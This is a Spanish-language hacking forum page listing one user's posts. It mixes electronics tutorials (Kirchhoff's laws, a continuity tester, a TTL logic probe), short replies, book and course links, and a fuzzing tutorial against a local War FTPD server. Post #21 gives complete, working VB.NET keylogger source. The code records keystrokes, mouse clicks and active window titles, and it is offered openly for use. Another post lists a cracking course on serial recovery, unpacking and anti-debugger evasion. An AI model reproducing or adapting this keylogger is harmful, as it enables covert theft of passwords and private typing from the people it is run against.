Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - dracko.rx

#21
C# - VB.NET / Keylogger Visual Basic .NET
Septiembre 28, 2012, 12:37:25 PM
Este recoje un gran variedad de teclas y obtiene el nombre de la ventana donde se esta escribiendo para mayor informacion y obtiene tambien clicks del mouse solo del boton Izquierdo.

Código: vbnet

'------------------------------------|
'|Keylogger profesional de Robokop   |
'|Este codigo esta reservado         |
'|Para uso personal su distribucion  |
'|esta penada por la ley mexicana.   |
'------------------------------------|

'Este codigo ha sido escrito desde Cero en visual Studio .Net 2005
'Esta versión se encuentra libre de errores y con un warning que
'no eh podido corregir pero no hay problema porque funciona bien y utiliza apis nativas de Vb6
'Ya que en el .NET no he encontrado NameSPace de getAsyncKeyState xD
'Este codigo se ha baso en declaraciones para obtener corresponditenes nombres
'ya que se basa en la resta de 32767 para obtener los caracteres correctos.
'Por cierto fue un lio encontrar los numeros de cada letra ¬¬.

Option Strict Off
Option Explicit On
Imports VB = Microsoft.VisualBasic
Friend Class Form1
Inherits System.Windows.Forms.Form
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Integer) As Short
Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Integer) As Short
Private Declare Function GetForegroundWindow Lib "user32" () As Integer
Private Declare Function GetWindowText Lib "user32"  Alias "GetWindowTextA"(ByVal hwnd As Integer, ByVal lpString As String, ByVal cch As Integer) As Integer
Private Declare Function GetWindowTextLength Lib "user32"  Alias "GetWindowTextLengthA"(ByVal hwnd As Integer) As Integer

Private LastWindow As String
Private LastHandle As Integer
Private dKey(255) As Integer
Private Const VK_SHIFT As Short = &H10s
Private Const VK_CTRL As Short = &H11s
Private Const VK_ALT As Short = &H12s
Private Const VK_CAPITAL As Short = &H14s
Private ChangeChr(255) As String
Private AltDown As Boolean

Private Sub Form1_Load(ByVal eventSender As System.Object, ByVal eventArgs As System.EventArgs) Handles MyBase.Load
        'Conversión de caracteres especiales....
        ChangeChr(33) = "[RePag]"
        ChangeChr(34) = "[AvPag]"
        ChangeChr(35) = "[Fin]"
        ChangeChr(36) = "[Inicio]"

        ChangeChr(45) = "[Insertar]"
        ChangeChr(46) = "[Suprimir]"

ChangeChr(48) = ")"
ChangeChr(49) = "!"
ChangeChr(50) = "@"
ChangeChr(51) = "#"
ChangeChr(52) = "$"
ChangeChr(53) = "%"
ChangeChr(54) = "^"
ChangeChr(55) = "&"
ChangeChr(56) = "*"
ChangeChr(57) = "("

ChangeChr(186) = ";"
ChangeChr(187) = "="
ChangeChr(188) = ","
ChangeChr(189) = "-"
ChangeChr(190) = "."
ChangeChr(191) = "/"

ChangeChr(219) = "["
ChangeChr(220) = "\"
ChangeChr(221) = "]"
ChangeChr(222) = "'"


ChangeChr(86) = ":"
ChangeChr(87) = "+"
ChangeChr(88) = "<"
ChangeChr(89) = "_"
ChangeChr(90) = ">"
ChangeChr(91) = "?"

ChangeChr(119) = "{"
ChangeChr(120) = "|"
ChangeChr(121) = "}"
ChangeChr(122) = """"


ChangeChr(96) = "0"
ChangeChr(97) = "1"
ChangeChr(98) = "2"
ChangeChr(99) = "3"
ChangeChr(100) = "4"
ChangeChr(101) = "5"
ChangeChr(102) = "6"
ChangeChr(103) = "7"
ChangeChr(104) = "8"
ChangeChr(105) = "9"
ChangeChr(106) = "*"
ChangeChr(107) = "+"
ChangeChr(109) = "-"
ChangeChr(110) = "."
ChangeChr(111) = "/"

ChangeChr(192) = "`"
ChangeChr(92) = "~"
End Sub

Function TypeWindow() As Object
Dim svar As Object
        'Funcion para saber el tipo de ventana y devolver el nombre.
Dim Handle_Renamed As Integer
Dim textlen As Integer
Dim WindowText As String
        'Obtenemos el nombre de la vetana de fondo
Handle_Renamed = GetForegroundWindow
LastHandle = Handle_Renamed
textlen = GetWindowTextLength(Handle_Renamed) + 1

        WindowText = Space(textlen) 'Obtenemos el espacio del nombre
        svar = GetWindowText(Handle_Renamed, WindowText, textlen) 'Guardamos en la variable svar_
        'El contenido del nombre
WindowText = VB.Left(WindowText, Len(WindowText) - 1)
        'Cuando se hace cambio de ventana se pasa un espacio y se pone un delimitador_
        'con ese delimitador nos damos cuenta de que el nombre ya cambio .
If WindowText <> LastWindow Then
            If Text1.Text <> "" Then Text1.Text = Text1.Text & vbCrLf & vbCrLf
            'Separador que escrimos en el textbox
Text1.Text = Text1.Text & "==============================" & vbCrLf & WindowText & vbCrLf & "==============================" & vbCrLf
            LastWindow = WindowText 'vemos ventana
End If
End Function

Private Sub Timer1_Tick(ByVal eventSender As System.Object, ByVal eventArgs As System.EventArgs) Handles Timer1.Tick
        Dim i As Object 'Timer que cada 5 milisegundos checa las pulsaciones de teclas...

        'cuando AlT se preciona.
If GetAsyncKeyState(VK_ALT) = 0 And AltDown = True Then
AltDown = False
            Text1.Text = Text1.Text & "[ALT]"
End If

        'Obtenemos caracteres de la A a la Z
        'Los obtenemos de una forma For To para Ahorrar codigo en especificar cada _
        'caracter asi que llevamos desde el numero ascii de A hasta la Z_
        'en mayuscula y miniscula
For i = Asc("A") To Asc("Z")

If GetAsyncKeyState(i) = -32767 Then
TypeWindow()

                If GetAsyncKeyState(VK_SHIFT) < 0 Then 'Shift
                    If GetKeyState(VK_CAPITAL) > 0 Then
                        Text1.Text = Text1.Text & LCase(Chr(i))
                        Exit Sub
                    Else
                        Text1.Text = Text1.Text & UCase(Chr(i))
                        Exit Sub
                    End If
                Else
                    If GetKeyState(VK_CAPITAL) > 0 Then 'Shift Izq
                        Text1.Text = Text1.Text & UCase(Chr(i))
                        Exit Sub
                    Else
                        Text1.Text = Text1.Text & LCase(Chr(i))
                        Exit Sub
                    End If
                End If

End If
Next

        'Obtenemos numeros del 1 al 0 y signos con shift
        '!"·$%&$%$$$··"·@@~~@€€36$%&$/$·$&&(/
For i = 48 To 57

If GetAsyncKeyState(i) = -32767 Then
TypeWindow()

If GetAsyncKeyState(VK_SHIFT) < 0 Then
                    Text1.Text = Text1.Text & ChangeChr(i)
Exit Sub
Else

Text1.Text = Text1.Text & Chr(i)
Exit Sub
End If

End If
Next


        'Obtenemos los signos donde estan los numeros en la parte derecha del teclado...
For i = 186 To 192

If GetAsyncKeyState(i) = -32767 Then
TypeWindow()

If GetAsyncKeyState(VK_SHIFT) < 0 Then
                    'Negacion-
Text1.Text = Text1.Text & ChangeChr(i - 100)
Exit Sub
Else
                    Text1.Text = Text1.Text & ChangeChr(i)
Exit Sub
End If

End If
Next


'[\]'
For i = 219 To 222

If GetAsyncKeyState(i) = -32767 Then
TypeWindow()

If GetAsyncKeyState(VK_SHIFT) < 0 Then

Text1.Text = Text1.Text & ChangeChr(i - 100)
Exit Sub
Else

Text1.Text = Text1.Text & ChangeChr(i)
Exit Sub
End If

End If
Next

        'Diferentes posiciones de Alt en el teclado.:P
        'Por cierto ya casi acabamos.
For i = 96 To 111

If GetAsyncKeyState(i) = -32767 Then
TypeWindow()

If GetAsyncKeyState(VK_ALT) < 0 And AltDown = False Then
AltDown = True
                    Text1.Text = Text1.Text & "[ALT-abajo]"
Else
If GetAsyncKeyState(VK_ALT) >= 0 And AltDown = True Then
AltDown = False
                        Text1.Text = Text1.Text & "[ALT-arriba]"
End If
End If


Text1.Text = Text1.Text & ChangeChr(i)
Exit Sub
End If
Next

        'Barra de Espacio y dejamos un espacio en el text
If GetAsyncKeyState(32) = -32767 Then
TypeWindow()
Text1.Text = Text1.Text & " "
End If

        'Enter
If GetAsyncKeyState(13) = -32767 Then
TypeWindow()
Text1.Text = Text1.Text & "[Enter]"
End If

        'Retroceso
If GetAsyncKeyState(8) = -32767 Then
TypeWindow()
            Text1.Text = Text1.Text & "[Retroceso]"
End If

        'Flecha Izq
If GetAsyncKeyState(37) = -32767 Then
TypeWindow()
            Text1.Text = Text1.Text & "[FlechaIzq]"
End If
        '----Flechas---------
        'Flecha arriba
If GetAsyncKeyState(38) = -32767 Then
TypeWindow()
            Text1.Text = Text1.Text & "[FlechaArriba]"
End If

        'Flecha derecha
If GetAsyncKeyState(39) = -32767 Then
TypeWindow()
            Text1.Text = Text1.Text & "[FlechaDer]"
End If

        'Flecha abajo
If GetAsyncKeyState(40) = -32767 Then
TypeWindow()
            Text1.Text = Text1.Text & "[FlechaAbajo]"
End If
        'Fin de flechas--------

        'Tabulador  ------>
        '           <------
If GetAsyncKeyState(9) = -32767 Then
TypeWindow()
            Text1.Text = Text1.Text & "[Tabulador]"
End If

'escape
If GetAsyncKeyState(27) = -32767 Then
TypeWindow()
Text1.Text = Text1.Text & "[Escape]"
End If

        'Intertar y suprimir
For i = 45 To 46

If GetAsyncKeyState(i) = -32767 Then
TypeWindow()
                Text1.Text = Text1.Text & ChangeChr(i)
End If
Next

        'Pagina arriba , pagina abajo ,home y End
For i = 33 To 36
            '
If GetAsyncKeyState(i) = -32767 Then
TypeWindow()
                Text1.Text = Text1.Text & ChangeChr(i)
End If
Next

        'Click izquierdo
If GetAsyncKeyState(1) = -32767 Then
            If (LastHandle = GetForegroundWindow) And LastHandle <> 0 Then 'Nos aseguramos que el click fue en la pagina vista
                Text1.Text = Text1.Text & "[ClickIzq]"
            End If
End If

End Sub

    Private Sub Text1_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Text1.TextChanged

    End Sub
End Class




Necesita un Timer de intervalo con 5 , puede ser menos pero yo lo probe con ese.
Este codigo fue probado con la versión Visual Studio 2005 Libre de errores y con un solo warning pero funciona sin problemas.
#22
Electrónica y Robótica / Leyes de Kirchhoff
Septiembre 22, 2012, 05:01:38 PM
En esta ocasión hablaremos de dos leyes muy útiles en el análisis de circuitos. Estas leyes són: ley de nodos o de las corrientes y ley de mallas o de las tensiones.
Primera ley de Kirchhoff o ley de las corrientes
La suma algebraica de todas las intensidades que llegan a un nodo es igual a la suma algebraica de todas las intensidades que se alejan del nodo.



Fijaros en la figura de arriba donde tenemos I1,I2 que llegan al nodo y I3,I4 que se alejan del No tienes permitido ver los links. Registrarse o Entrar a mi cuenta adoptamos que es positiva(+) las corrientes que llegan y negativas(-) las corrientes que se alejan, se puede escribir esta ecuación.

I1+I2-I3-I4=0


Donde se deduce que:la suma algebraica de todas las intensidades que concurren en un nodo es igual a cero.

Segunda ley de Kirchhoff o ley de las tensiones

En toda malla o circuito cerrado,la suma algebraica de todas las fem debe ser igual a la suma algebraica de la caida de tensión en todas las resistencias intercaladas a lo largo de aquella malla o circuito cerrado.



En el circuito de arriba tenemos que V3=V1+V2

Recordemos la diferencia que hay entre fem y caida de tensión o ddp (V=RxI).

La fem es producida en una fuente de tensión y proviene de la generación de electricidad por cualquier No tienes permitido ver los links. Registrarse o Entrar a mi cuenta caida de tensión o voltaje es generada a través de una resistencia y viene dada por RxI.Las caidas de voltaje son negativas donde se deduce que:la suma algebraica de las tensiones a lo largo de una malla o contorno es cero.

Saludos.
#23
Electrónica y Robótica / Tester de continuidad
Septiembre 22, 2012, 04:55:39 PM
En esta publicación les presento un interesante proyecto muy fácil de hacer y práctico, que nos permitira comprobar continuidad en pistas de circuitos y cables, por decir alguna de las utilidades que le podes dar al instrumento.

Esquema eléctrico




Lista de componentes

Resistencias (todas de 1/4 w)
1 10k ohmios
2 330 "
1 1k "
1 100k "
1 22k "

Semiconductores
1 555 (timer)
1 hcf4093b (NAND de dos entradas schmitt trigger)
1 led 5mm verde
1 led 5mm rojo

Condensadores
2 10nf

Varios
1 Buzzer polarizado
2 pinzas cocodrilo y cable rojo negro
1 Conector para pila de 9v



Funcionamiento del circuito

Tenemos un sistema de visualización formado por dos led, uno rojo y el otro verde. Estos dos led's estan controlados por un flip-flop r-s hecho con compuertas NAND, estas puertas esta integradas en el HEF4093B.



Luego el timer 555 esta configurado como astable que genera una frecuencia audible cuando el material en prueba es conductor.

Entremos un poco mas en detalle del funcionamiento del circuito. Fijaros en el esquema que hay dos resistencia en serie formando un divisor de tensión resistivo por R3 y R4, en paralelo con R4 hay un punto abierto que es donde se conectara el objeto para saber si es aislante o conductor.


Si es aislante la tensión Vcc se reparte entre R3 y R4, pero como la resistencia R4 es mucho mayor que R3, casi toda la tensión recae en R4, esto se traduce en un nivel lógico(1) que es aplicado al flip-flop r-s formado por las compuertas NAND, esto hace que se mantenga en estado reset y activa el led rojo, el led verde permanece apagado. Por otro lado el timer 555 esta desactivado ya que la patilla 1 que debe estar a tierra esta a un potencial positivo y permanece apagado. En resumen, en esta condición el led rojo permanece encendido y no hay sonido, indicando que el material es aislante.


En la condición de continuidad cuando cerramos el circuito , el punto de unión de la resistencia R3 y R4 queda a tierra, esto se traduce en un nivel lógico (0) que es aplicado al flip-flop r-s haciendolo bascular de su estado reset a set , el led verde se activa y al mismo tiempo pone a tierra al terminal 1 del timer 555, produciendo un sonido en el buzzer. En resumen, en esta condición el led verde permanece encendido y produciendo un sonido indicando que hay continuidad.

Espero que les sirva, Saludos.
#24
Sonda lógica con display 7 segmentos TTL



La sonda lógica es un instrumento de suma utilidad cuando hay que analizar circuitos digitales.Como la mayoría de nosotros ya saben, los circuitos digitales solo trabajan con dos estados o niveles de tensión. Si hablamos de lógica TTL (lógica transistor-transistor) la tensión booleana para el 1 lógico es de +5v y para el 0 lógico es 0v, esta sonda es para analizar circuitos del tipo TTL.


Este es el diagrama eléctricos de la sonda.



Lista de materiales

1 ic7404
1 Display 7 segmentos de ánodo común
1 transistor NPN 2N3904
1 Resistencia 1k
1 Resistencia 10k
1 Resistencia de 470
5 Resistencias de 220
1 Base ic 14 pines
2 Pinzas de cocodrilo roja y negra
1 Punta
cable rojo y negro



Para el chasis del circuito yo he utilizado una funda de plástico de CD.


Funcionamiento del circuito.

El circuito esta dividido en dos partes marcadas como H y L. La etapa H indica una condición alta (1 lógico), la forman las resistencia R2,R3 y R8, el transistor Q1 y los inversores D y E del circuito IC 7404.

La etapa L indica una condición baja (0 lógico), la forman las resistencias R1,R4,R5,R6 y R7 y los inversores A,B y C del circuito IC 7404.



Los inversores B y C forman un buffer de corriente. Su salida controla los segmentos a,b,g y f del display. Cuando este punto es bajo los leds de estos segmentos se iluminan, mostrando un cero en el display. En resumen, cuando se aplica un bajo (0 voltios) a la entrada el inversor A recibe un bajo a través de R1, entrega un alto al buffer C,D y este suministra un bajo a los segmentos a,b,g y f a través de R4,R5,R6 y R7.



Los inversores D y E forman también un buffer de corriente, su salida controla el segmento e del display. Cuando ese punto es bajo, por efecto de un alto en la entrada, el led de este segmento se ilumina, mostrando un 1 en el display. En resumen, cuando se aplica un alto en la entrada el transistor q1 recibe un alto en su base a través de la resistencia R2 y conduce, aplicando un alto a la entrada del buffer C,D. Este último suministrar un bajo al segmento e del display.



Cuando se aplica un tren de impulsos a la entrada, se suceden alternativamente los dos casos expuestos, iluminando los segmentos a,b,e,f y g y el display muestra la letra P, que significa pulsos.



Como pueden apreciar es un montaje fácil, práctico y muy útil!!!

Saludos.
#25
Muy buen aporte bro, muy interesante.

Saludos
#26
Buen aporte. :)
#27


Python se está convirtiendo en el lenguaje de programación elegido por muchos que se dedican al hacking, a la ingeniería inversa y a probar software. La razón principal es que es fácil y rápido de escribir, soporta bajo nivel y tiene bibliotecas que nos hacen felices.

Ya no tendremos que buscar siempre en foros y manuales, Gray Hat Python muestra el uso de Python para una amplia variedad de tareas de hacking. Este libro explica los conceptos detrás de las herramientas de hacking y las técnicas con depuradores, troyanos, fuzzers y emuladores. Pero el autor, Justin Seitz, va más allá de la teoría mostrando cómo aprovechar las herramientas existentes de seguridad basadas en Python - y cómo construir las tuyas propias cuando lo necesites.

Leyendo este libro aprenderas a:

* Automatizar las tediosas tareas de ingeniería inversa y seguridad
* Diseñar y programar tu propio depurador
* Fuzzear drivers de Windows y a crear potentes fuzzers desde el principio
* Divertirte con la inyección de código y librerías, técnicas de soft y hard hooking y otros trucos con software
* Esnifar tráfico seguro de sesión web cifrada
* Usar PyDBG, Immunity Debugger, Sulley, IDAPython, PyEMU y más






No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Espero que les sirva y les guste.

Saludos dracko.rx
#28
C / C++ / Tutorial de iniciación al lenguaje C
Junio 28, 2012, 05:26:17 PM



Les dejo un tutorial sobre el lenguaje C. Espero que les guste.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#29
Tutorial completo sobre cracking con ollydbg.

Contiene 48 partes, los temas son los siguientes:

PARTE 001  -  CONOCIENDO A OLLYDBG - INSTALACION
PARTE 002  -  SISTEMAS NUMERICOS - NUMEROS POSITIVOS - NEGATIVOS - CARACTERES ASCII - QUE ES EL STACK
PARTE 003  -  REGISTROS Y FLAGS
PARTE 004  -  INSTRUCCIONES DE ASSEMBLER -  NOP, PUSH, POP, PUSHAD, POPAD, MOV, MOVSX, MOVZX, LEA, XCHG,
PARTE 005  -  INSTRUCCIONES MATEMATICAS - INC, DEC, ADD, ADC, SUB, SBB, MUL, IMUL, DIV, IDIV, XADD, NEG
                         INSTRUCCIONES LOGICAS - AND, XOR, OR, NOT -
PARTE 006  -  INSTRUCCIONES - COMPARACIONES Y SALTOS CONDICIONALES
PARTE 007  -  INSTRUCCIONES - CALL Y RET
PARTE 008  -  INSTRUCCIONES PARA LOOPS O CICLOS (BUCLES)
PARTE 009  -  PRIMERA APROXIMACION AL CRACKING - CRACKME DE CRUEHEAD
PARTE 010  -  BREAKPOINTS - BP COMUNES, ON MEMORY
PARTE 011  -  BREAKPOINTS - HARDWARE BREAKPOINTS - BP CONDICIONALES
PARTE 012  -  LOS MENSAJES DE WINDOWS - COLOCANDO BP EN LOS MENSAJES DE WINDOWS
PARTE 013  -  PEZCANDO Y REVIRTIENDO SERIALES
PARTE 014  -  PEZCANDO Y REVIRTIENDO SERIALES - HARCODED SERIALS
PARTE 015  -  PEZCANDO Y REVIRTIENDO SERIALES - HARCODED SERIALS
PARTE 016  -  PEZCANDO Y REVIRTIENDO SERIALES - HARCODED SERIALS
PARTE 017  -  PEZCANDO Y REVIRTIENDO SERIALES - HARCODED SERIALS - BUSCANDO EL SERIAL EN LA MEMORIA (CUANDO NO TENEMOS BOTON CHECK)
PARTE 018  -  PEZCANDO Y REVIRTIENDO SERIALES - BUSCANDO EL SERIAL EN LA MEMORIA (CUANDO NO TENEMOS BOTON CHECK)
PARTE 019  -  PROTECCIONES ANTIDEBUGGER - COMO EVITARLAS MANUALMENTE Y CON PLUGINS - api: IsDebuggerPresent -
PARTE 020  -  PROTECCIONES ANTIDEBUGGER - COMO EVITARLAS MANUALMENTE Y CON PLUGINS - POR NOMBRE DEL PROCESO - api: EnumProcesses
PARTE 021  -  PROTECCIONES ANTIDEBUGGER - COMO EVITARLAS MANUALMENTE Y CON PLUGINS - POR NOMBRE DEL PROCESO - POR NOMBRE O CLASE DE LA VENTANA - api: CreateToolhelp32Snapshot, Process32First, Process32Next, FindWindowA
PARTE 022  -  PROTECCIONES ANTIDEBUGGER - COMO EVITARLAS MANUALMENTE Y CON PLUGINS - apis: UnhandeldExceptionFilter - ZwQueryInformationProcess
PARTE 023  -  PROTECCIONES ANTIDEBUGGER - COMO EVITARLAS MANUALMENTE Y CON PLUGINS - ProcessHeapFlag  y  NTGlobalFlag
PARTE 024  -  PROTECCIONES ANTIDEBUGGER - Resolviendo el Antisocial de la parte 23
PARTE 025  -  EXCEPCIONES
PARTE 026  -  CRACKEANDO VISUAL BASIC - NAGS

PARTE 027  -  CRACKEANDO VISUAL BASIC - NAGS, METODO DEL 4C
PARTE 028  -  CRACKEANDO VISUAL BASIC - INJERTAR EN DLL (MODIFICARLA)
PARTE 029  -  CRACKEANDO VISUAL BASIC - P-CODE
PARTE 030  -  CRACKEANDO VISUAL BASIC - P-CODE 2DA PARTE
PARTE 031  -  UNPACKING - NICIONES BASICAS
PARTE 032  -  UNPACKING - BUSCAR OPCODES, BUSCADOR DE OEP DE OLLY, METODO PUSHADD, METODO EXCEPCIONES, METODO API MUY USADA,
         METO PRIMERA API EJECUTADA
PARTE 033  -  UNPACKING - QUE ES IAT Y COMO REPARARLA
PARTE 034  -  UNPACKING - CON AYUDA DE PE TOOLS, IMPREC
PARTE 035  -  UNPACKING - CON OLLYDUMP, IMPREC  (EJEMPLO ASPACK)
PARTE 036  -  UNPACKING - CON OLLYDUMP, IMPREC  (OTRO EJERCICIO PRACTICO)
PARTE 037  -  UNPACKING - REPARAR ENTRADAS REDIRECCIONADAS
PARTE 038  -  UNPACKING - REPARAR ENTRADAS REDIRECCIONADAS
PARTE 039  -  STOLEN BYTES Y SCRIPTS
PARTE 040  -  SCRIPTS   (DESEMPACADO DEL PELOCK)
PARTE 041  -  SCRIPTS   (CONT. DESEMPACADO DEL PELOCK)
PARTE 042  -  UNPACKING - STOLEN BYTES (ACPROTECT 1.09)
PARTE 043  -  UNPACKING - REPARAR STOLEN BYTES (ACPROTECT 1.09)
PARTE 044  -  UNPACKING - REPARAR IAT - SCRIPTS (ACPROTECT 1.09)
PARTE 045  -  UNPACKING - REPARAR IAT - DUMPEADO (ACPROTECT 1.09)
PARTE 046  -  UNPACKING - FATMIKE
PARTE 047  -  UNPACKING - FATMIKE (2DA PARTE)
PARTE 048  -  UNPACKING - PESPIN 1.304





No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: Ricardo Navaja
#30
Buena info, la voy a leer :)
#31
Buen post.
#32
Bueno ayer hablando de varios temas con mi novia me conto que habia visto en la televicion una noticia sobre esta mistoriosa pagina de internet que salio, llamada No tienes permitido ver los links. Registrarse o Entrar a mi cuenta .. Busque por muchos lados en la Red pero nadie supo decirme que es concretamente y para que sirve..

Una de las curiosidades que vi en la pagina es que Copyfight en vez de Copyright ..

La verdad que me intriga mucho saber que es y para que esta esa web.. Si Alguien sabe del tema me gustaria que lo comenten.

Saludos, Dracko.rx
#33
Bugs y Exploits / ¿Qué son los Fuzzers?
Febrero 25, 2010, 11:55:40 AM
¿Fuzzing, Fuzzers que es todo esto?

  [idea] Para comenzar, diremos que se conoce como "Fuzzing" a las diferentes técnicas de software automatizadas, capaces de generar y enviar datos secuenciales o aleatorios a una o varias áreas o puntos de una aplicación, con el objeto de detectar defectos o vulnerabilidades existentes en el software auditado.

[idea] Las herramientas con capacidad de "Fuzzing", a menudo son conocidas como "Fuzzers", y dependiendo de la implementación que cada una de estas herramientas haga de las técnicas de "Fuzzing", es probable que existan tipos que se ajusten mejor a cada una de las diferentes necesidades del researcher o profesional a cargo del testing (Protocolos / Networking, Application / WebApplication, etc.).

[idea] Si bien es cierto que el concepto de "Fuzzing" es de ámbito general de acuerdo a lo mencionado, quizás no sea mala idea el que conozcas como funciona cada una de las herramientas a tu alcance, antes de decidir su tilización en alguno de tus proyectos personales.

[idea] Pero imagino que probablemente exista quien aún no haya entendido a lo que me estoy refiriendo, por tanto me permitiré tomar el siguiente ejemplo: Supongamos que necesitamos conocer si una aplicación en particular posee algún tipo de Buffer Overflow, a fin de detectar este tipo de situación, un tester sencillamente podría generar datos de distintos tamaños y enviar estos a uno de los puntos de entrada existentes en la aplicación, con el objeto de observar su comportamiento ante estas pruebas o mejor dicho como estos requerimientos son manejados. Si el programa a testear falla en tal menester, esto significara dos cosas: que hay defectos que corregir, y que probablemente sea posible explotar la falla.

[idea] De acuerdo a lo mencionado hasta aquí, podemos inferir que el principal uso del Fuzzing, es el de testear software (servicios, protocolos, aplicaciones, etc.) con el objeto de encontrar defectos de desarrollo o implementación. Este testing no solo puede (y debe) ser llevado a cabo como parte del ciclo de vida de un desarrollo, sino que también comprende un método excelente de testeo a ser aplicado como parte de pentest del tipo "BlackBox". Debido a su relativa sencillez, estas técnicas a menudo poseen una relación costo beneficio altamente efectiva. A pesar de esto, el Fuzzing no reemplaza el testing manual o los métodos tradicionales de testeo de software y QA, este solo podrá proveernos de una serie de pruebas aleatorias que podrían mostrarnos solo una parte del
problema.

  Fuzzing de Protocolos

[idea] El "Fuzzing" de protocolos, no es muy diferente al "Fuzzing" de aplicación. Cada protocolo posee su propio set de parámetros y una estructura que a menudo puede ser testeada. Los "Fuzzers" basan parte de su tarea en la ventaja que les brinda el conocer exactamente como "debería" funcionar determinado protocolo basándose en los RFCs relacionados a tal o cual de ellos. De este modo, el Fuzzer sabe que debe esperar de cada una de las pruebas a las que someterá al protocolo a testear (o mejor dicho su implementación) y podrá alertar al tester cuando encuentre una respuesta que no ha podido ser manejada o ha sido manejada erróneamente.

[idea] Pero ¿como hace realmente un Fuzzer para llevar a cabo su tarea? a fin de ejemplificar su operatoria, me basaré de un ejemplo que oportunamente publicara Sacha Faust, de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  en un excelente paper que aprovecho a recomendar desde aquí, el cual se denomina "Web Application Testing with SPI Fuzzer". 

[idea] Cuando se trabaja con fuzzing sobre HTTP, generalmente se intenta testear al menos cada uno de los siguientes aspectos del protocolo o su implementación:

[idea] Para que quede un tanto mas claro, la idea detrás del fuzzing de protocolo http en este ejemplo, es básicamente la de parsear cada uno de los aspectos que componen el protocolo y testear mediante la generación de determinados requerimientos, cada uno de estos componentes en forma individual, a fin de  identificar el modo en que la implementación maneja las excepciones o inclusive la alteración de tráfico real.

[idea] El request HTTP citado a continuación, corresponde a un requerimiento real hecho por un browser a un sitio web determinado. Las partes dispuestas en color rojo, representan algunos de los datos/campos que tal como mencionáramos en el párrafo anterior podrían ser sometidos a "Fuzzing" en forma individual, a fin de observar su comportamiento:

  El primer Acercamiento: Fuzzer 1.1

[idea] Bien, ahora que conoces conceptualmente alguno de los aspectos más importantes en torno al Fuzzing, creo que es hora de dar nuestros primeros pasos en la utilización de alguna herramienta que implemente este tipo de técnicas.

[idea] Una rápida búsqueda en Google, probablemente arroje una serie de páginas con links a algunas de las herramientas más populares. Algunos buenos ejemplos de estas, sin lugar a dudas sean: SPIKE 2.9 de Immunitysec, mielietools 1.0 de Sensepost, SPI Fuzzer de SPI Dynamics y Fuzzer 1.1 de Sergio "Shadown" Alvarez.

[idea] A los efectos de ilustrar este artículo, he decidido utilizar mi preferido: Fuzzer 1.1 de  Sergio "Shadown" Alvarez. Los motivos de esta elección son varios. En primer lugar, su código se encuentra disponible y se distribuye bajo GPL. En segundo lugar, es pequeño, sencillo, potente, rápido y esta escrito en Python .

[idea] Antes de comenzar vamos a asegurarnos de que has obtenido lo necesario como para tener Fuzzer 1.1 funcionando en tu equipo de pruebas:

  Python 2.2:Puesto que Fuzzer 1.1, se encuentra desarrollado en Python, la instalación de este entorno resulta imprescindible

  pyOpenSSL:A fin de manejar en forma correcta el tráfico SSL, Fuzzer 1.1 requiere tener instaladas las librerías provistas por este wrapper de nombre pyOpenSSL  . Su instalación es sumamente sencilla y no deberías tener problemas para tener funcionando esta en segundos.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

  Fuzzer 1.1

  Descargar Fuzzer 1.1 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

[idea] Fuzzer 1.1 es una sencilla y potente herramienta de "fuzzing" desarrollada por Sergio "Shadown" Alvarez . Esta se entrega con los protocolos FTP, SMTP y POP3 declarados por defecto y listos para usar,  aunque debido a su concepción modular, el agregado de nuevos protocolos, debería resultar en una tarea sencilla pro medio de la edición del archivo de configuración "protocols.py". Al descargar el tar.gz, no tendrás más que disponer de un directorio (fuzzer-1.1 por defecto) donde descomprimir sus archivos y comenzar a disfrutar de sus bondades.

[idea] Ok, si todo ha salido bien, tu sistema contará a partir de este momento, con una instalación de Python, las rutinas SSL requeridas por la aplicación, y Fuzzer 1.1 lista para ser ejecutada. Para constatar que todo este funcionando, sencillamente abriremos  una ventana de comandos (Ejecutar-->CMD.exe-->Enter),  nos situaremos sobre el directorio donde hemos instalado Fuzzer 1.1, y ejecutaremos la siguiente línea:


Código: php
C:\Documents and Settings\Administrador\Escritorio\fuzzer-1.1>fuzzer.py 


  Luego de dar entrada al comando anterior, deberías estar viendo la ayuda de Fuzzer 1.1 tal como se muestra en la Imagen.



[idea] Felicitaciones!!
ya estas en condiciones de comenzar a realizar testear algunas aplicaciones y protocolos!, que ¿como haces esto? bien... la verdad es que la respuesta acuanto tus conocimientos de lenguajes de programación, protocolos, networking y seguridad, pero para no decepcionarte vamos a descargar un viejo programa FTP muy conocido por su popularidad y por la existencia de algunos Buffer Overflows encontrados en algunas de sus versiones, en particular en la 1.65, se trata de War FTP Daemon

  Descargar War FTPD Daemon 1.65No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

[idea] Ok, te diré lo que haremos ahora para poder probar la efectividad de Fuzzer 1.1 en la detección de posibles bugs en el software... Descargado e instalado este servidor FTP(Setup.exe), procederemos a ejecutarlo (war-ftpd.exe). Luego de dar OK en la pantalla de bienvenida, nos encargaremos de que el servicio FTP se ponga a correr... para esto, deberemos hacer click en el icono ilustrado con un rayo



Ya es hora, abriremos ahora una nueva ventana de comando (CMD.EXE), ingresaremos al directorio donde hayamos instalado el Fuzzer, y procederemos a ejecutarlo con la siguiente línea de comando:

Código: php
C:\Documents and Settings\Administrador\Escritorio\fuzzer-1.1>fuzzer.py –h localhost –p 21 –t FTP 




[idea] Perfecto, luego de dar entrada a esta línea, Fuzzer se pondrá a trabajar creando y enviando paquetes, para luego evaluar su resultado .



[idea] Ahora bien, puesto que el software que estamos testeando tiene un bug (Reportado y reparado hace mucho tiempo ya...) llegara un momento donde Fuzzer hará que WarFTPD se cierre inesperadamente, para luego anunciar un mensaje en pantalla  en donde podrás leer:



[idea] Ahora Analizamos la Informacion que nos Entrega Fuzzer 1.1 .


[idea] Ahora si nos Damos Cuenta en un inicio del Analisis.

